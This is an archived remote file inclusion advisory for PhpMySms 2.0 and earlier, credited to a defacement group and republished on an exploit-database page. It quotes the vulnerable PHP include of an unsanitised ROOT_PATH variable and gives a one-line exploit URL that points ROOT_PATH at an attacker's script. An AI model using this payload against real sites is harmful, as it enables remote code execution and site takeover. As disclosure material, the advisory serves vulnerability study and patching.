PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability URL : Http://www.phpmysms.com Author=Persian-Defacer www.Hacking-Boys.com ============================================================== if (($_POST[mode] == "1") or ($_GET[mode] == "1")) { include ("config.php"); } else { include ("$ROOT_PATH/config.php"); } ============================================================== Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script] # milw0rm.com [2006-06-24]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论